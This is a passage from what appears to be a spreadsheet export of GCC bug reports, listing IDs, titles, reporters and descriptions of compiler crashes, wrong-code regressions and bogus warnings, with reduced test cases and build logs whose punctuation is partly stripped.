The bug is that the volatileness of the dereference of the write (the assignment through a pointer to a volatile structure) in function pb_out is discarded leaving a single write after the loop.  Note also that together with the discarded-volatileness-bug there seems to be a missed-optimization-bug in that the loop is redundant the loop awkwardly computes iterates over 0..31 and computes 1&lt;&lt;i but the intermediate computations aren't used then the last value is written after the loop. Editing the code to manually inline pb_out makes no difference to the bug.
The wrong code is evident already in the .expand dump on trunk (according to -da).  It is not present (according to -fdump-tree-all-all) in y.i.096t.loopinit but appears present in y.i.097t.lim1.
Until someone (including myself) has repeated the observation for another target I'll set the target-specifier to cris*-* but it seems obviously generic affecting all targets.</t>
  </si>
  <si>
    <t>GCC-79894</t>
  </si>
  <si>
    <t>[5 Regression] ICE in gfc_add_modify_loc at fortran/trans.c:159</t>
  </si>
  <si>
    <t>Starting from r217421 we ICE on:
$ gcc /home/marxin/Programming/gcc/gcc/testsuite/gfortran.dg/complex_intrinsic_6.f90  -c
/home/marxin/Programming/gcc/gcc/testsuite/gfortran.dg/complex_intrinsic_6.f90:35:0:
   z4 = asin(z4) ! { dg-error Fortran 2008: COMPLEX argument }
internal compiler error: in gfc_add_modify_loc at fortran/trans.c:159
0x73e520 gfc_add_modify_loc(unsigned int stmtblock_t* tree_node* tree_node*)
	../../gcc/fortran/trans.c:158
0x7783b1 gfc_trans_scalar_assign(gfc_se* gfc_se* gfc_typespec bool bool bool)
	../../gcc/fortran/trans-expr.c:8793
0x7899ea gfc_trans_assignment_1
	../../gcc/fortran/trans-expr.c:10064
0x73ec87 trans_code
	../../gcc/fortran/trans.c:1817
0x76fce8 gfc_generate_function_code(gfc_namespace*)
	../../gcc/fortran/trans-decl.c:6306
0x6f7890 translate_all_program_units
	../../gcc/fortran/parse.c:6070
0x6f7890 gfc_parse_file()
	../../gcc/fortran/parse.c:6270
0x73b80f gfc_be_parse_file
	../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-30968</t>
  </si>
  <si>
    <t>[4.1 only] Bogus warning with continued lines of concatenated strings</t>
  </si>
  <si>
    <t>The following program gives a bogus warning when
compiled with -Wall or -std=f95 or -std=f2003:
program gfcbug59
  print * Hello&amp;
       //  World      ! Bogus warning with -Wall or -std=f95 or -std=f2003
end program gfcbug59
% gfc -Wall gfcbug59.f90
gfcbug59.f90:3.8:
       //  World      ! Bogus warning with -Wall or -std=f95 or -std=f2003
       1
Warning: Missing '&amp;' in continued character constant at (1)
gfcbug59.f90:3.8:
       //  World      ! Bogus warning with -Wall or -std=f95 or -std=f2003
       1
Warning: Missing '&amp;' in continued character constant at (1)</t>
  </si>
  <si>
    <t>GCC-9666</t>
  </si>
  <si>
    <t>Argument used as expression in a new-declarator does not get implicitly converted to integral type</t>
  </si>
  <si>
    <t>g++ produces error size in array new must have integral type if you use new[] with an argument of a class with two integral conversion operators which are identical exception one is a const method.  The conversion works if used to pass the class object as a size_t function argument and works with new if you remove either one of the conversion operators.
Release:
3.2
Environment:
Cygwin under Windows 2000 Professional
How-To-Repeat:
#include	
struct	X
{
	operator size_t	()				{	return
2	}
	operator size_t	()	const	{	return	3	}
}
char	*f1	(	size_t	n	)		{	return
new	char[n]	}
char	*f2	(	const X	&amp;x	)	{	return	new
char[x]	}
int	main	(void)					{	}
/*
$ g t.cpp -ot
t.cpp: In function `char* f2(const X&amp;)':
t.cpp:11: size in array new must have integral type
*/</t>
  </si>
  <si>
    <t>brainchild</t>
  </si>
  <si>
    <t>GCC-38747</t>
  </si>
  <si>
    <t>[4.4 Regression] Wrong code due to VIEW_CONVERT_EXPR</t>
  </si>
  <si>
    <t>struct S { float f }
int __attribute__((noinline))
foo (int *r struct S *p)
{
  int *q = (int *)
  int i = *q
  *r = 0
  return i + *q
}
extern void abort (void)
int main()
{
  int i = 1
  if (foo (&amp;i (struct S *)&amp;i) != 1)
    abort ()
}</t>
  </si>
  <si>
    <t>GCC-49387</t>
  </si>
  <si>
    <t>t.cxx:140: error: too many initializers for â€˜const __class_type_info_pseudoâ€™</t>
  </si>
  <si>
    <t>I am getting this weird compilation error which I am not able to understand what it means:
$ g++ t.cxx
t.cxx:140: error: too many initializers for â€˜const __class_type_info_pseudoâ€™
See attached cxx file.</t>
  </si>
  <si>
    <t>GCC-56634</t>
  </si>
  <si>
    <t>libgcc does not compile for 4.7.2: Yields internal compiler error: Bus error</t>
  </si>
  <si>
    <t>Created attachment 29681
preprocessed file generated by adding -save-temps
I was compiling the distribution for gcc 4.7.2 and broke with:
/tmp/obj/./gcc/xgcc -B/tmp/obj/./gcc/ -B/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/bin/ -B/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/lib/ -isystem /usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/include -isystem /usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/sys-include    -g -O2 -m64 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -pipe -Wa-force_cpusubtype_ALL -mmacosx-version-min=10.4 -fno-common -mlong-double-128 -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -pipe -Wa-force_cpusubtype_ALL -mmacosx-version-min=10.4 -fno-common -mlong-double-128 -I. -I. -I../../.././gcc -I../../../../gcc-4.7.2/libgcc -I../../../../gcc-4.7.2/libgcc/. -I../../../../gcc-4.7.2/libgcc/../gcc -I../../../../gcc-4.7.2/libgcc/../include   -DUSE_EMUTLS -o _muldi3.o -MT _muldi3.o -MD -MP -MF _muldi3.dep -DL_muldi3 -c ../../../../gcc-4.7.2/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
../../../../gcc-4.7.2/libgcc/libgcc2.c: In function '__multi3':
../../../../gcc-4.7.2/libgcc/libgcc2.c:549:1: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
------------------------------------------------------------------
 The output obtained when flags -v -savetemps are added to the command line is:
xgcc: warning: -pipe ignored because -save-temps specified
Reading specs from /tmp/obj/./gcc/specs
COLLECT_GCC=/tmp/obj/./gcc/xgcc
Target: powerpc-apple-darwin9.8.0
Configured with: ../gcc-4.7.2/configure --prefix=/usr/local/gcc-4.72 --enable-languages=cc++fortran --disable-nls
Thread model: posix
gcc version 4.7.2 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-B' '/tmp/obj/./gcc/' '-B' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/bin/' '-B' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/lib/' '-isystem' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/include' '-isystem' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/sys-include' '-g' '-O2' '-m64' '-O2' '-g' '-O2' '-D' 'IN_GCC' '-Wextra' '-Wall' '-Wwrite-strings' '-Wcast-qual' '-Wstrict-prototypes' '-Wmissing-prototypes' '-Wold-style-definition' '-isystem' './include' '-pipe' '-mmacosx-version-min=10.4' '-mlong-double-128' '-g' '-D' 'IN_LIBGCC2' '-fbuilding-libgcc' '-fno-stack-protector' '-pipe' '-mmacosx-version-min=10.4' '-fno-common' '-mlong-double-128' '-I' '.' '-I' '.' '-I' '../../.././gcc' '-I' '../../../../gcc-4.7.2/libgcc' '-I' '../../../../gcc-4.7.2/libgcc/.' '-I' '../../../../gcc-4.7.2/libgcc/../gcc' '-I' '../../../../gcc-4.7.2/libgcc/../include' '-D' 'USE_EMUTLS' '-o' '_muldi3.o' '-MT' '_muldi3.o' '-MD' '-MP' '-MF' '_muldi3.dep' '-D' 'L_muldi3' '-c' '-fvisibility=hidden' '-D' 'HIDE_EXPORTS'
 /tmp/obj/./gcc/cc1 -E -quiet -v -I . -I . -I ../../.././gcc -I ../../../../gcc-4.7.2/libgcc -I ../../../../gcc-4.7.2/libgcc/. -I ../../../../gcc-4.7.2/libgcc/../gcc -I ../../../../gcc-4.7.2/libgcc/../include -imultilib ppc64 -iprefix /private/tmp/obj/gcc/../lib/gcc/powerpc-apple-darwin9.8.0/4.7.2/ -isystem /tmp/obj/./gcc/include -isystem /tmp/obj/./gcc/include-fixed -MD _muldi3.d -MF _muldi3.dep -MP -MT _muldi3.o -D__DYNAMIC__ -D IN_GCC -D IN_LIBGCC2 -D USE_EMUTLS -D L_muldi3 -D HIDE_EXPORTS -isystem /usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/include -isystem /usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/sys-include -isystem ./include ../../../../gcc-4.7.2/libgcc/libgcc2.c -feliminate-unused-debug-symbols -fPIC -m64 -mmacosx-version-min=10.4 -mlong-double-128 -mmacosx-version-min=10.4 -mlong-double-128 -Wextra -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -fbuilding-libgcc -fno-stack-protector -fno-common -fvisibility=hidden -g -g -g -fworking-directory -O2 -O2 -O2 -fpch-preprocess -o libgcc2.i
ignoring nonexistent directory /usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/include
ignoring nonexistent directory /usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/sys-include
ignoring nonexistent directory ./include
ignoring nonexistent directory /private/tmp/obj/gcc/../lib/gcc/powerpc-apple-darwin9.8.0/4.7.2/include
ignoring nonexistent directory /private/tmp/obj/gcc/../lib/gcc/powerpc-apple-darwin9.8.0/4.7.2/include-fixed
ignoring nonexistent directory /private/tmp/obj/gcc/../lib/gcc/powerpc-apple-darwin9.8.0/4.7.2/../../../../powerpc-apple-darwin9.8.0/include
ignoring nonexistent directory /private/tmp/obj/gcc/../lib/gcc/../../lib/gcc/powerpc-apple-darwin9.8.0/4.7.2/include
ignoring nonexistent directory /private/tmp/obj/gcc/../lib/gcc/../../include
ignoring nonexistent directory /private/tmp/obj/gcc/../lib/gcc/../../lib/gcc/powerpc-apple-darwin9.8.0/4.7.2/include-fixed
ignoring nonexistent directory /private/tmp/obj/gcc/../lib/gcc/../../lib/gcc/powerpc-apple-darwin9.8.0/4.7.2/../../../../powerpc-apple-darwin9.8.0/include
ignoring duplicate directory .
ignoring duplicate directory ../../../../gcc-4.7.2/libgcc/.
#include ... search starts here:
#include  search starts here:
 .
 ../../.././gcc
 ../../../../gcc-4.7.2/libgcc
 ../../../../gcc-4.7.2/libgcc/../gcc
 ../../../../gcc-4.7.2/libgcc/../include
 /Users/basilio/tbb22_013oss/include
 /tmp/obj/./gcc/include
 /tmp/obj/./gcc/include-fixed
 /usr/local/include
 /usr/include
 /System/Library/Frameworks
 /Library/Frameworks
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-B' '/tmp/obj/./gcc/' '-B' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/bin/' '-B' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/lib/' '-isystem' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/include' '-isystem' '/usr/local/gcc-4.72/powerpc-apple-darwin9.8.0/sys-include' '-g' '-O2' '-m64' '-O2' '-g' '-O2' '-D' 'IN_GCC' '-Wextra' '-Wall' '-Wwrite-strings' '-Wcast-qual' '-Wstrict-prototypes' '-Wmissing-prototypes' '-Wold-style-definition' '-isystem' './include' '-pipe' '-mmacosx-version-min=10.4' '-mlong-double-128' '-g' '-D' 'IN_LIBGCC2' '-fbuilding-libgcc' '-fno-stack-protector' '-pipe' '-mmacosx-version-min=10.4' '-fno-common' '-mlong-double-128' '-I' '.' '-I' '.' '-I' '../../.././gcc' '-I' '../../../../gcc-4.7.2/libgcc' '-I' '../../../../gcc-4.7.2/libgcc/.' '-I' '../../../../gcc-4.7.2/libgcc/../gcc' '-I' '../../../../gcc-4.7.2/libgcc/../include' '-D' 'USE_EMUTLS' '-o' '_muldi3.o' '-MT' '_muldi3.o' '-MD' '-MP' '-MF' '_muldi3.dep' '-D' 'L_muldi3' '-c' '-fvisibility=hidden' '-D' 'HIDE_EXPORTS'
 /tmp/obj/./gcc/cc1 -fpreprocessed libgcc2.i -feliminate-unused-debug-symbols -fPIC -quiet -dumpbase libgcc2.c -m64 -mmacosx-version-min=10.4 -mlong-double-128 -mmacosx-version-min=10.4 -mlong-double-128 -auxbase-strip _muldi3.o -g -g -g -O2 -O2 -O2 -Wextra -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -version -fbuilding-libgcc -fno-stack-protector -fno-common -fvisibility=hidden -o libgcc2.s
GNU C (GCC) version 4.7.2 (powerpc-apple-darwin9.8.0)
	compiled by GNU C version 4.0.1 (Apple Inc. build 5465) GMP version 5.1.1 MPFR version 2.4.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (GCC) version 4.7.2 (powerpc-apple-darwin9.8.0)
	compiled by GNU C version 4.0.1 (Apple Inc. build 5465) GMP version 5.1.1 MPFR version 2.4.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: b3e480fea1096570677449fcf222ced7
../../../../gcc-4.7.2/libgcc/libgcc2.c: In function '__multi3':
../../../../gcc-4.7.2/libgcc/libgcc2.c:549:1: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>basilio</t>
  </si>
  <si>
    <t>GCC-68216</t>
  </si>
  <si>
    <t>[F2003] IO problem with allocatable deferred character length arrays</t>
  </si>
  <si>
    <t>The following segfaults in the READ statement:
PROGRAM hello
    IMPLICIT NONE
    CHARACTER(LEN=:)DIMENSION(:)ALLOCATABLE :: array_lineas
    INTEGER :: largo  cant_lineas  i
    WRITE(**) ' Escriba un numero para el largo de cada linea'
    READ(**) largo
    WRITE(**) ' Escriba la cantidad de lineas'
    READ(**) cant_lineas
    ALLOCATE(CHARACTER(LEN=largo) :: array_lineas(cant_lineas))
    WRITE(**) 'Escriba el array' len(array_lineas) size(array_lineas)
    READ(**) (array_lineas(i)i=1cant_lineas)
    WRITE(**) 'Array guardado: '
    DO i=1cant_lineas
    WRITE(**) array_lineas(i)
    ENDDO
    READ(**)
END PROGRAM
Reported on clf
https://groups.google.com/forum/#!topic/comp.lang.fortran/eWQTKfqKLZc
Paul</t>
  </si>
  <si>
    <t>GCC-14233</t>
  </si>
  <si>
    <t>SEGFAULT with -O3 -ffast-math</t>
  </si>
  <si>
    <t>Under Mac OS 10.3.2 some Boost.Python applications compiled with -O3
-ffast-math fail at runtime. The same code works if compiled with -O0.
g++ (GCC) 3.4.0 20040220 (prerelease)
Configured with: /net/worm/scratch1/rwgk/gcc-3_4-branch/configure --
prefix=/usr/local_cci/gcc-3_4-branch_2004_02_20 --enable-languages=cc++
Apple G5 under OS 10.3.2:
Darwin coral.lbl.gov 6.8 Darwin Kernel Version 6.8: Wed Sep 10 15:20:55
PDT 2003 root:xnu/xnu-344.49.obj~2/RELEASE_PPC  Power Macintosh powerpc
To reproduce the bug get this completely self-contained package:
   http://cci.lbl.gov/~rwgk/bugs/gcc340/gcc340_mac_20040220.tar.gz
To unpack and see the complete information about the source code:
  gunzip -c gcc340_mac_20040220.tar.gz | tar xf -
  cd gcc340_mac_20040220
  more SOURCE_CODE_INFO
It is assumed that g++ == gcc 3.4.0.
The first demonstration compiles with -O0:
  ./demo_optimizer_problem_1.csh
The output should end with:
g++ -w -bundle -
bundle_loader /System/Library/Frameworks/Python.framework/Versions/2.3/Python /S
ystem/Library/Frameworks/Python.framework/Versions/2.3/Python -o 
libtbx/boost_rational_ext.so boost_adaptbx/rational_ext.os -Llibtbx -
L/net_scarlet/scratch1/rwgk/gcc340_mac/libtbx -lboost_python -lm
scons: done building targets.
python ../boost_adaptbx/tst_rational.py
OK
To show the failure when compiling with -O3 -ffast-math:
  ./demo_optimizer_problem_2.csh
The output should end with:
g++ -w -bundle -
bundle_loader /System/Library/Frameworks/Python.framework/Versions/2.3/Python /S
ystem/Library/Frameworks/Python.framework/Versions/2.3/Python -o 
libtbx/boost_rational_ext.so boost_adaptbx/rational_ext.os -Llibtbx -
L/net_scarlet/scratch1/rwgk/gcc340_mac/libtbx -lboost_python -lm
scons: done building targets.
python ../boost_adaptbx/tst_rational.py
Segmentation fault
The same source code works fine with gcc 3.4.0 20040220 under Linux
and many other compilers including Apple's Xcode 1.1.
Sorry for the big package but it would be impractical for me to work
out a smaller example. It took several hours already to prepare the set
of reports I am submitting today. I hope you have tools that make it
much easier to pin-point the root of the problem. When you run the demo
the output shows all commands used. You can copy-and-paste the commands
to run them without the build system. If you look at the .csh scripts:
libtbx.scons is a replacement for make. The rest should be obvious
I hope.</t>
  </si>
  <si>
    <t>GCC-68449</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE in cxx_eval_constant_expression on atomic_load in C++</t>
  </si>
  <si>
    <t>Compiling the following program with the latest trunk triggers a number of errors due to the _Atomic qualifier that's not recognized in C++ followed by an ICE:
$ cat z.cpp &amp;&amp; /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -S -Wall -o/dev/null  -xc++ z.cpp
#include 
int foo (int *p)
{
    return atomic_load (p) &lt; 0
}
After reducing that to a small test case I ended up with the following valid code.
Searching for cxx_eval_constant_expression suggests this might be a duplicate of bug 68348.
$ cat z.ii &amp;&amp; /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -S -Wall -o/dev/null -xc++ z.ii
int foo (int a)
{
    return __extension__ ({
        __typeof__ (a) b
        b }) &lt; 0
}
z.ii: In function â€˜int foo(int)â€™:
z.ii:5:17: internal compiler error: Segmentation fault
         b }) &lt; 0
                 ^
0xffa298 crash_signal
	/home/msebor/scm/fsf/gcc-svn/gcc/toplev.c:334
0x9f417f cxx_eval_constant_expression
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/constexpr.c:3198
0x9f377d cxx_eval_statement_list
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/constexpr.c:3029
0x9f59ce cxx_eval_constant_expression
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/constexpr.c:3614
0x9f5a4d cxx_eval_constant_expression
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/constexpr.c:3620
0x9f628a cxx_eval_outermost_constant_expr
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/constexpr.c:3774
0x9f6c9c maybe_constant_value_1
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/constexpr.c:3960
0x9f6d99 maybe_constant_value(tree_node* tree_node*)
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/constexpr.c:3981
0x8f5e3c cp_build_binary_op(unsigned int tree_code tree_node* tree_node* int)
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/typeck.c:5045
0x73e1d4 build_new_op_1
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/call.c:5758
0x73e2c8 build_new_op(unsigned int tree_code int tree_node* tree_node* tree_node* tree_node** int)
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/call.c:5803
0x8f1d8f build_x_binary_op(unsigned int tree_code tree_node* tree_code tree_node* tree_code tree_node** int)
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/typeck.c:3828
0x892faa cp_parser_binary_expression
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:8591
0x8932a1 cp_parser_assignment_expression
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:8712
0x893511 cp_parser_expression
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:8871
0x8981bc cp_parser_jump_statement
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:11408
0x895904 cp_parser_statement
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:10035
0x896408 cp_parser_statement_seq_opt
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:10426
0x896303 cp_parser_compound_statement
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:10380
0x8a70f3 cp_parser_function_body
	/home/msebor/scm/fsf/gcc-svn/gcc/cp/parser.c:20192
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
tmp$</t>
  </si>
  <si>
    <t>GCC-21238</t>
  </si>
  <si>
    <t>conflicting typedef __numpunct_cache    __cache_type in std::numpunct makes specialization impossible</t>
  </si>
  <si>
    <t>It is not possible to specialise std::numpunct defined    
in /bits/locale_facets.h. in a portable way due to typedef 
__numpunct_cache     
__cache_type within the std::numpunct template.   
This bug seems to be present at least in 3.4.4 and 4.0 but not 3.3.4.</t>
  </si>
  <si>
    <t>bduerner</t>
  </si>
  <si>
    <t>GCC-30850</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with invalid asm statement</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 3.4.0:
=====================================
void foo()
{
  asm( :: 0)
}
=====================================
bug.cc: In function 'void foo()':
bug.cc:3: error: expected string-literal before numeric constant
bug.cc:3: error: expected `(' before numeric constant
bug.cc:3: error: expected `)' before '' token
bug.cc:3: internal compiler error: tree check: expected string_cst have error_mark in resolve_asm_operand_names at stmt.c:1234
Please submit a full bug report [etc.]
The bug is similar to PR 30849 but the crash is in a different function.</t>
  </si>
  <si>
    <t>GCC-38288</t>
  </si>
  <si>
    <t>i386/i386.c: 7 * set but not used variables</t>
  </si>
  <si>
    <t>I just tried to build the GNU gcc version 4.4.0 snapshot 20081121
with the Intel C compiler which said
../../src/gcc-4.4-20081121/gcc/config/i386/i386.c(4315): warning #593: variable f was set but never used
../../src/gcc-4.4-20081121/gcc/config/i386/i386.c(7479): warning #593: variable total_size was set but never used
../../src/gcc-4.4-20081121/gcc/config/i386/i386.c(8886): warning #593: variable reason was set but never used
../../src/gcc-4.4-20081121/gcc/config/i386/i386.c(8887): warning #593: variable reason_rtx was set but never used
../../src/gcc-4.4-20081121/gcc/config/i386/i386.c(13074): warning #593: variable op1 was set but never used
../../src/gcc-4.4-20081121/gcc/config/i386/i386.c(13520): warning #593: variable arithmetics_costwas set but never used
../../src/gcc-4.4-20081121/gcc/config/i386/i386.c(16432): warning #593: variable piece_size_mask was set but never used
I checked the source code and I agree with the Intel compiler.
Suggest delete all seven set but not used variables.</t>
  </si>
  <si>
    <t>GCC-11079</t>
  </si>
  <si>
    <t>Ada: Inline-Assembler - Outputs =&gt; only stores last mentioned register</t>
  </si>
  <si>
    <t>I am using the Mingw distribution: gcc-3.2-Ada-20020817-1.tar.gz. on both 
Windows NT 4 Sp6a and Windows XP Home.
Because I am new to Ada and as a test I copied the inline assembler example 
from section 24.7 of the GNAT Users' Guide for Unix Platforms. The example 
compiled Ok but the Vendor_ID function was producing odd results. In 
particular instead of GenuineIntel it was returning xxxxineIxxxx where 
the xs are random(ish) characters. 
When I compiled using -S the listing showed that only register edx (the one 
containing ineI!) was being stored into the Ada variable ebx and ecx were 
being ignored. This is despite the fact that the code contains:
    Outputs =&gt; (Unsigned_Register'Asm_output (=b Ebx)
                Unsigned_Register'Asm_output (=c Ecx)
                Unsigned_Register'Asm_output (=d Edx)) )
By swapping the order around I was able to demonstrate that code was only 
being generated to store the last mentioned register (edx in the example). The 
other registers were being ignored!
I have generated a cut down unit asm_bug.adb (and asm_bug.S) demonstrating the 
problem that I can send if required. This unit includes a function Vendor_ID_OK 
that uses CPUID three times storing ebx ecx and edx separately and returns the 
correct result of GenuineIntel.
Regards
Graham</t>
  </si>
  <si>
    <t>graham.hanson</t>
  </si>
  <si>
    <t>GCC-17986</t>
  </si>
  <si>
    <t>[4.0 Regression] Compile error for make.adb breaks bootstrap</t>
  </si>
  <si>
    <t>During bootstrap with Ada and libada enabled:
../../xgcc -B../../ -c -O2 -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -fno-common      -gnatpg -gnata -I- -I../rts -I.
-I/aaronwl/cs/compilers/gcc/src/cvs/head/gcc/gcc/ada
/aaronwl/cs/compilers/gcc/src/cvs/head/gcc/gcc/ada/make.adb -o make.o
raised STORAGE_ERROR : EXCEPTION_STACK_OVERFLOW
make[4]: *** [make.o] Error 1
This error is generated after running for about 50 seconds.
It can be worked around by changing -O2 to -O1.
Configured with: ../../src/cvs/head/gcc/configure
--enable-languages=adacc++f95javaobjc --with-dwarf2 --enable-libmudflap
--enable-libgcj --with-win32-nlsapi=unicows --enable-libstdcxx-allocator=mt
--enable-libstdcxx-debug --prefix=/aaronwl/cs/env/mingw-head-head-head-20041012
--with-included-gettext
--with-libiconv-prefix=/aaronwl/cs/internat/iconv/install
--with-gmp=/aaronwl/cs/env/mingw-head-head-head-20041012
--with-mpfr=/aaronwl/cs/env/mingw-head-head-head-20041012
Thread model: win32
gcc version 4.0.0 20041013 (experimental)
i686-pc-mingw32
Windows XP SP2 Professional
Pentium 4 256MB
binutils mainline 2.15.92 20040920
mingwrt mainline 20041012
msvcrt 7.0.2600.2180
w32api mainline 20041012
libiconv 1.9.1
Environment and misc. tools from Cygwin Current Thu Oct  7 19:20:20 2004</t>
  </si>
  <si>
    <t>GCC-35602</t>
  </si>
  <si>
    <t>Bogus warning with -Wsign-conversion</t>
  </si>
  <si>
    <t>This warning makes no sense to me:
alpha1:test&gt;g++ -Wsign-conversion -c test050.cc 
test050.cc: In function 'int main(int const char* const*)':
test050.cc:10: warning: conversion to 'long unsigned int' from 'long int' may change the sign of the result
See attached test case. The warning appears with a two-dimensional array of
std::string. It goes away with one dimension or if string is replaced with int.
The size or type of the array indices doesn't seem to matter.
alpha1:PD&gt;uname -a
Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown
alpha1:PD&gt;g++ -v
Using built-in specs.
Target: alphaev56-unknown-linux-gnu
Configured with: ../gcc/configure --verbose --enable-languages=c++ --disable-linux-futex --disable-nls --disable-tls
Thread model: posix
gcc version 4.3.0 20070829 (experimental) (GCC) 
alpha1:PD&gt;alias CONFIGURECVS
alias CONFIGURECVS='../gcc/configure --verbose --enable-languages=c++ --disable-linux-futex --disable-nls --disable-tls &gt;clog 2&gt;&amp;1 &amp;'
alpha1:PD&gt;alias BUILD
alias BUILD='nice gmake CFLAGS='\'''\'' BOOT_CFLAGS='\'''\'' LIBCFLAGS='\''-g'\'' LIBCXXFLAGS='\''-g'\'' bootstrap &gt;log 2&gt;&amp;1 &amp;'
Same thing occurs on cygwin.</t>
  </si>
  <si>
    <t>GCC-32839</t>
  </si>
  <si>
    <t>internal compiler error: Segmentation fault (templates)</t>
  </si>
  <si>
    <t>Yesterday one of my collegues ran into an internal compiler error when playing with some template code.
Although she ran into the ICE on Mac OS X with an Apple gcc 4.01 build it was easy enough to reproduce it on a linux box with a GNU gcc build. I'm logging this against 4.2.1 but it seems every 4.x version segfaults I tested with 4.02 4.1-20060113 (yep some old build laying around) 4.2.1 and even with the latest 4.3-20070713.
I created a small test case (see attachment) and this is the output I get with 4.2.1:
dannyb@linux:~/bugs/ice&gt; ~/opt/gcc-4.2.1/bin/g++ -v -o test test.cpp
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.2.1/configure --prefix=/home/dannyb/opt/gcc-4.2.1 --enable-languages=cc++
Thread model: posix
gcc version 4.2.1
 /home/dannyb/opt/gcc-4.2.1/libexec/gcc/i686-pc-linux-gnu/4.2.1/cc1plus -quiet -v -D_GNU_SOURCE test.cpp -quiet -dumpbase test.cpp -mtune=generic -auxbase test -version -o /tmp/ccyPKN6k.s
ignoring nonexistent directory /home/dannyb/opt/gcc-4.2.1/lib/gcc/i686-pc-linux-gnu/4.2.1/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/dannyb/opt/gcc-4.2.1/lib/gcc/i686-pc-linux-gnu/4.2.1/../../../../include/c++/4.2.1
 /home/dannyb/opt/gcc-4.2.1/lib/gcc/i686-pc-linux-gnu/4.2.1/../../../../include/c++/4.2.1/i686-pc-linux-gnu
 /home/dannyb/opt/gcc-4.2.1/lib/gcc/i686-pc-linux-gnu/4.2.1/../../../../include/c++/4.2.1/backward
 /usr/local/include
 /home/dannyb/opt/gcc-4.2.1/include
 /home/dannyb/opt/gcc-4.2.1/lib/gcc/i686-pc-linux-gnu/4.2.1/include
 /usr/include
End of search list.
GNU C++ version 4.2.1 (i686-pc-linux-gnu)
	compiled by GNU C version 4.2.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: cfede80d80c2b8e19355e4026d77f0b9
test.cpp: In member function â€˜void ScopeImpl::Execute() [with F = void (*)(int)]â€™:
test.cpp:31:   instantiated from â€˜static void ScopeImplBase::SafeExecute(J&amp;) [with J = ScopeImpl]â€™
test.cpp:50:   instantiated from â€˜ScopeImpl::~ScopeImpl() [with F = void (*)(int)]â€™
test.cpp:46:   instantiated from â€˜static void ScopeImpl::MakeGuard(F) [with F = void (*)(int)]â€™
test.cpp:68:   instantiated from â€˜void DoAtExit(F) [with F = void (*)(int)]â€™
test.cpp:74:   instantiated from here
test.cpp:54: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>dannyb</t>
  </si>
  <si>
    <t>GCC-25042</t>
  </si>
  <si>
    <t>[4.0 Regression] __float128 ICE on x86</t>
  </si>
  <si>
    <t>Compile the following test (reduced from gcc.dg/torture/fp-int-convert-float128.c) on i686-pc-linux-gnu with -O -mmmx.  It gives an ICE
z.c: In function 'main':
z.c:9: internal compiler error: in cgraph_local_info at cgraph.c:525
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
